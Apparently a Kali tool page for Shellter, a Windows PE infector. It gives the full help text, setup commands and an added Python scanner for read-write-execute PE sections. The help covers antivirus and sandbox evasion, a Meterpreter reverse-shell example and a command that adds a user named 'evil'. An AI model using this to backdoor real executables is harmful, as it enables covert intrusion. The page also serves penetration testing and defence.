shellter Package Description
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. It can be used to inject shellcode into native Windows applications (currently 32-bit applications only). The shellcode can be your own or generated through a framework such as Metasploit.
Source: https://www.shellterproject.com/introducing-shellter/
shellter Homepage | Kali shellter Repo
- Author: Kyriakos Economou
- License: special
Tools included in the shellter package
shellter – Dynamic shellcode injection tool and dynamic PE infector
root@kali:~# shellter.exe -h
**********************
* Command Line Usage *
**********************
Help: -h, --help
Action: Shows the command line help menu.
List Payloads: --list
Action: Shows a list of the embedded payloads.
Verbose Mode: -v
Action: Shows Real-Time Tracing.
Operation Mode: -a / -m
Action: Sets the Operation Mode to use.
-a: Auto Mode, -m: Manual Mode. (See Remarks)
Note: Manual Mode requires user interaction for all options.
Online version check: --VersionCheck
Action: Retrieves version information from the official website.
Note: Requires internet connection. Not available in Wine mode.
PE target: -f <filename>
Action: Sets the PE target.
Stealth Mode: -s / --stealth
Action: Enables Stealth Mode feature. Preserves original functionality of
the infected PE file.
Note: If this feature is enabled then --enc, --encode, and --handler IAT
are implied as set.
Payload: -p <filename>/<listed payload>
Action: Sets the payload. Must be in RAW format.
Metasploit: generate -t raw.
The following payloads can be used directly through Shellter.
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP [stager]
[2] Meterpreter_Reverse_HTTP [stager]
[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP [stager]
[5] Shell_Reverse_TCP [stager]
[6] Shell_Bind_TCP [stager]
[7] WinExec
Example: -p meterpreter_reverse_tcp --lhost 192.168.30.133 --port 4444
LHOST: --lhost <IP address>/<Domain Name>
Action: Sets the IP address or the Domain Name for the embedded payloads
that use reverse connection.
Note: Domain names can be used with the reverse_http and reverse_https
payloads, or with custom payloads generated by the user.
Port: --port <Port number>
Action: Sets the port number for the embedded payloads that
either use reverse connection, or listen locally for
inbound connections.
CMD: --cmd <cmd argument>
Action: Sets the command to execute argument for the embedded
windows command execution payload.
Example: -p winexec --cmd "cmd.exe /c net user evil password /ADD"
Enable DLL Reflective Loader support: --reflective <FuncName>
Action: Marks the payload as DLL and sets the reflective loader function.
This flag automatically enables encoded-payload support because the loader
might require RW permissions to itself. You will have to set the --handler
argument as well.
Note: Function names are case sensitive.
Threads tracing: --trace main / all
Action: Sets the threads to be traced.
main: Main Thread, all: All Threads Tracing.
Note: It is recommended to enable all threads tracing. This is enabled
by default when auto mode is used without command line arguments.
Enable encoded-payload support: --enc
Action: Handles encoded payloads.
Note: If you use an encoded payload, this flag is mandatory! However,
it is enabled by default when auto mode is used without command
line arguments.
It is recommended to always use encoded payloads, unless they
are completely custom, thus not known to AVs.
Note: You can choose to apply Shellter's encoder by using the --encode
arument. It can also be used on top of already encoded payloads.
Proprietary Shellter Encoding: --encode / --encode {<encoding sequence>}
Action: Applies an extra encoding layer.
It is enabled by default when using auto mode without command
line arguments.
********************************
* Supported Encoding Operators *
********************************
XOR --> x
ADD --> +
SUB --> -
NOT --> !
Example #1: x!+x
Note: When the encoding sequence is defined from the command line, the
operators need to be enclosed between '{}'.
Example #2: --encode {x!+}
Note: In Manual mode you must not include the '{}' characters, just as in the
first example shown above.
Remarks: The number of operators defined, must be between a minimum of 1 and
a maximum of 12 operators.
If you just use the --encode switch without defining a custom
sequence of encoding operations, Shellter will randomly create
and apply an encoding scheme by itself.
If you enable stealth mode using --stealh/-s switches, then the
--encode switch is implied, but if you want to use a custom one
then you need to explicitly use the --encode switch as shown
in Example #2.
Note: You will have to set the --handler argument as well.
Note: If you set --encode switch, then --enc is implied as set.
Encode using Dynamic Thread Context Key: --DTCK
Action: Encodes the payload using dynamic thread context information.
Note: This is an experimental feature that logs the content of some
CPU registers and then filters all that data in order to keep
injection locations where at least one of the logged registers
has a value that can be reliably used for encoding and later
for decoding the payload on runtime.
Note: If you set this flag, then --encode and --enc are implied as set.
In Auto mode, this feature can only be activated by using command
line arguments.
Proprietary Decoder Obfuscation: --polyDecoder
Action: Obfuscates the decoder generated by Shellter using
Thread Context Aware Polymorphic code.
Note: This only applies if --encode option has been set. It is
enabled by default when using auto mode without command
line arguments.
Encoded Payload Handling Type: --handler iat / section
Action: Defines how the encoded payload will be handled.
iat: Use IAT pointers, section: Give to section RWE permissions.
Note: If you use an encoded payload, this flag is mandatory! However,
when you use auto mode without command line arguments, this is
enabled by default.
Obfuscate IAT type handler: --polyIAT
Action: Enables obfuscation of IAT type handlers for encoded payloads
using Thread Context Aware Polymorphic code.
Note: Contributes towards a much more polymorphic output! It is enabled
by default when using auto mode without command line arguments.
Generate & Bind PolyMorphic Junk Code: --junk
Action: Enables PolyMorphic Junk Code.
Note: It is recommended to enable this option in order to produce
a more complex output. This type of code added also serves
for timing-out some emulators and sandboxes. You might have
to wait for a few seconds before the payload gets executed.
Note: This feature is enabled by default when using automode without
command line arguments.
Remarks:
i. When running inside Wine, the compatible Engine is selected automatically.
ii. If Manual Mode has been selected, all other options are ignored.
iii. If no Operation Mode (-a/-m) has been selected though command line,
then Auto Mode applies.
iv. If '--enc' and/or '--encode' and/or --DTCK are set, then '--handler' must
be also set.
v. Tracing of all threads is enabled by default when using the Auto Mode.
You can disable it by specifying '--trace main' -Not Recommended-.
vi. If Stealth Mode is enabled (-s/--stealth), the injected payload will
always be encoded by Shellter and --handler IAT is set by default.
vii. Arguments can be passed in any order. If the same argument is used more
than once, then only the first occurence is taken in consideration.
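The `--handler section` option above works by granting one section of the target read, write and execute permissions at once, so a section whose characteristics are RWE is a cheap static indicator a defender can check for. The following is an added example, not code from the Kali page or from Shellter: a header-only PE section-flag scanner run over a constructed sample image (`rwe_sections`, `build_sample_pe` and the sample data are assumptions of this example).

```python
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWE = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE


def rwe_sections(pe: bytes):
    """Return the names of sections that are readable, writable and
    executable at once. Only the headers are parsed, no code is run."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # COFF file header follows the 4-byte signature: NumberOfSections at +6,
    # SizeOfOptionalHeader at +20; section table starts after the optional header.
    num_sections, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    sec_off = e_lfanew + 24 + opt_size
    found = []
    for i in range(num_sections):
        off = sec_off + 40 * i  # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars, = struct.unpack_from("<I", pe, off + 36)  # Characteristics field
        if chars & RWE == RWE:
            found.append(name)
    return found


def build_sample_pe(section_flags):
    """Build a header-only PE32 image (constructed test data, not a real binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header right after DOS header
    opt = bytes(224)  # zeroed PE32 optional header; only its size matters here
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_flags), 0, 0, 0, len(opt), 0x102)
    sections = b""
    for name, flags in section_flags:
        sections += struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, flags)
    return bytes(dos) + b"PE\0\0" + coff + opt + sections


# Constructed sample: a normal RX .text, an RW .data, and one section left RWE.
SAMPLE = build_sample_pe([
    (b".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | 0x20),
    (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40),
    (b".rsrc", RWE | 0x40),
])

if __name__ == "__main__":
    print("RWE sections:", rwe_sections(SAMPLE))
```

RWE sections also occur in some legitimately packed or self-modifying binaries, so treat a hit as a triage signal to be combined with other checks rather than a verdict on its own.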
shellter Usage Examples
root@kali:~# dpkg --add-architecture i386
root@kali:~# apt update && apt install wine32
root@kali:~# shellter